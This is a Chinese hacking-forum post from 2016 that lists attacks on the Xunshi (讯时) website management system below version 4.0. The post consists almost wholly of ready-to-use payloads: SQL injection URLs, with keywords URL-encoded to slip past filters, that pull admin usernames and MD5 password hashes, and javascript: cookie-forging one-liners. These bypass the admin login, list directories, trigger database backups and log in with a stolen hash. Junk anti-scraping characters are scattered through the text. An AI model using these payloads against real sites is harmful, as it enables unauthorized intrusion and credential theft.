找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2278|回复: 0
打印 上一主题 下一主题

讯时网站管理系统4.0以下漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2016-5-11 14:55:08 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
一、注入- ?+ E0 f% S: j' x
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2: f  d. k  Y# I* P" W/ j

: Z5 H! V: z7 W6 N7 f8 H& i1 D( t3 I2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" ) q! ]0 ]1 i3 c6 G  Y3 C
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin2 t: v' L! R' ]' [) P4 R2 J. G+ q
可得到用户名和MD5加密码的密码。
' a) I) ~8 ?% d8 l! X5 s' `' D5 n/ v7 T$ O2 N2 X0 a
二、cookies欺骗
9 R& T  X8 D+ ^+ [( E8 `3 Y# {8 K5 r- x3 X" x) X' R
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. 5 `" I- S+ C/ x' U: F
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
& f0 H, c1 g; G9 U& p* Q9 c9 I9 N1 U) y/ L
2、列目录.
% j' d9 a  a8 H- ?  r5 c# }7 hjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."* Z3 `  N6 v9 s
1 z  V9 I* U' Q2 q8 B+ m
3、数据库备份(适用性好像比较低.) : V, U2 v( `: f4 i" s4 }6 K
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
+ ?$ Y( c2 d9 i- H7 J- Q0 |
0 ], y2 ?- j/ S, \/ G9 H+ K. I4、得到MD5密码解不了密进后台方法
! W0 n- P; s. J% J, w& ?' n) Ujavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
) u1 _; a6 ~9 m* x5 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表